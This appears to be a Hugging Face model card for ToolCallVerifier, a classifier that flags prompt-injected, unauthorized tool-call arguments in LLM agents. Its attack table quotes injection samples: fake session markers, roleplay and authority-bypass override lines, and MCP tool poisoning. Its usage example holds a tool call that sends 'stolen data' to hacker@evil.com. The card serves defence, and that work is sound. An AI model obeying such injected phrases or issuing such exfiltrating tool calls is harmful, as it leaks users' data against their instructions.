Token Classification
Transformers
Safetensors
English
modernbert
security
jailbreak-detection
prompt-injection
tool-calling
llm-safety
mcp
Eval Results (legacy)
# Load model directly
from transformers import AutoTokenizer, AutoModelForTokenClassification
tokenizer = AutoTokenizer.from_pretrained("rootfs/tool-call-verifier")
model = AutoModelForTokenClassification.from_pretrained("rootfs/tool-call-verifier")Quick Links
ToolCallVerifier - Unauthorized Tool Call Detection
🎯 What This Model Does
ToolCallVerifier is a ModernBERT-based token classifier that detects unauthorized tool calls in LLM agent systems. It performs token-level classification on tool call JSON to identify malicious arguments that may have been injected through prompt injection attacks.
| Label | Description |
|---|---|
AUTHORIZED |
Token is part of a legitimate, user-requested action |
UNAUTHORIZED |
Token indicates injected/malicious content — BLOCK |
📊 Performance
| Metric | Value |
|---|---|
| UNAUTHORIZED F1 | 93.50% |
| UNAUTHORIZED Precision | 95.01% |
| UNAUTHORIZED Recall | 92.05% |
| Overall Accuracy | 92.88% |
Confusion Matrix (Token-Level)
Predicted
AUTH UNAUTH
Actual AUTH 130,708 8,483
UNAUTH 13,924 161,031
🗂️ Training Data
Trained on ~30,000 samples combining real-world attacks and synthetic patterns:
HuggingFace Datasets
| Dataset | Description | Samples |
|---|---|---|
| LLMail-Inject | Microsoft email injection benchmark | ~10,000 |
| WildJailbreak | Allen AI adversarial safety dataset | ~8,000 |
| HackAPrompt | EMNLP'23 injection competition | ~5,000 |
| JailbreakBench | Harmful behavior patterns | ~2,000 |
Synthetic Attack Generators
| Generator | Description |
|---|---|
| Adversarial | Intent-mismatch attacks (correct tool, wrong args) |
| Filesystem | File/directory operation attacks |
| Network | Network/API exfiltration attacks |
| Email tool hijacking | |
| Financial | Transaction manipulation |
| Code Execution | Code injection attacks |
| Authentication | Access control bypass |
| MCP Attacks | Tool poisoning, shadowing, rug pulls |
🚨 Attack Categories Covered
| Category | Source | Description |
|---|---|---|
| Delimiter Injection | LLMail | <<end_context>>, >>}}\]\]) |
| Word Obfuscation | LLMail | Inserting noise words between tokens |
| Fake Sessions | LLMail | START_USER_SESSION, EXECUTE_USERQUERY |
| Roleplay Injection | WildJailbreak | "You are an admin bot that can..." |
| XML Tag Injection | WildJailbreak | <execute_action>, <tool_call> |
| Authority Bypass | WildJailbreak | "As administrator, I authorize..." |
| Intent Mismatch | Synthetic | User asks X, tool does Y |
| MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
| MCP Shadowing | Synthetic | Fake authorization context |
💻 Usage
from transformers import AutoTokenizer, AutoModelForTokenClassification
import torch
model_name = "rootfs/tool-call-verifier"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForTokenClassification.from_pretrained(model_name)
# Example: Verify a tool call
user_intent = "Summarize my emails"
tool_call = '{"name": "send_email", "arguments": {"to": "hacker@evil.com", "body": "stolen data"}}'
# Combine for classification
input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
inputs = tokenizer(input_text, return_tensors="pt", truncation=True, max_length=2048)
with torch.no_grad():
outputs = model(**inputs)
predictions = torch.argmax(outputs.logits, dim=-1)
id2label = {0: "AUTHORIZED", 1: "UNAUTHORIZED"}
tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
labels = [id2label[p.item()] for p in predictions[0]]
# Check for unauthorized tokens
unauthorized_tokens = [(t, l) for t, l in zip(tokens, labels) if l == "UNAUTHORIZED"]
if unauthorized_tokens:
print("⚠️ BLOCKED: Unauthorized tool call detected!")
print(f" Flagged tokens: {[t for t, _ in unauthorized_tokens[:5]]}")
else:
print("✅ Tool call authorized")
⚙️ Training Configuration
| Parameter | Value |
|---|---|
| Base Model | answerdotai/ModernBERT-base |
| Max Length | 512 tokens |
| Batch Size | 32 |
| Epochs | 5 |
| Learning Rate | 3e-5 |
| Loss | CrossEntropyLoss (class-weighted) |
| Class Weights | [0.5, 3.0] (AUTHORIZED, UNAUTHORIZED) |
| Attention | SDPA (Flash Attention) |
| Hardware | AMD Instinct MI300X (ROCm) |
🔗 Integration with FunctionCallSentinel
This model is Stage 2 of a two-stage defense pipeline:
┌─────────────────┐ ┌──────────────────────┐ ┌─────────────────┐
│ User Prompt │────▶│ FunctionCallSentinel │────▶│ LLM + Tools │
│ │ │ (Stage 1) │ │ │
└─────────────────┘ └──────────────────────┘ └────────┬────────┘
│
┌──────────────────────────────▼──────────────────────────┐
│ ToolCallVerifier (This Model) │
│ Token-level verification before tool execution │
└─────────────────────────────────────────────────────────┘
| Scenario | Recommendation |
|---|---|
| General chatbot | Stage 1 only |
| Tool-calling agent (low risk) | Stage 1 only |
| Tool-calling agent (high risk) | Both stages |
| Email/file system access | Both stages |
| Financial transactions | Both stages |
🎯 Intended Use
Primary Use Cases
- LLM Agent Security: Verify tool calls before execution
- Prompt Injection Defense: Detect unauthorized actions from injected prompts
- API Gateway Protection: Filter malicious tool calls at infrastructure level
Out of Scope
- General text classification
- Non-tool-calling scenarios
- Languages other than English
⚠️ Limitations
- Tool schema dependent — Best performance when tool schema is included in input
- English only — Not tested on other languages
- Binary classification — No "suspicious" intermediate category (by design, for decisiveness)
📜 License
Apache 2.0
🔗 Links
- Stage 1 Model: rootfs/function-call-sentinel
- Downloads last month
- 6
Model tree for rootfs/tool-call-verifier
Base model
answerdotai/ModernBERT-baseDatasets used to train rootfs/tool-call-verifier
Evaluation results
- UNAUTHORIZED F1self-reported0.935
- UNAUTHORIZED Precisionself-reported0.950
- UNAUTHORIZED Recallself-reported0.920
- Accuracyself-reported0.929
# Use a pipeline as a high-level helper from transformers import pipeline pipe = pipeline("token-classification", model="rootfs/tool-call-verifier")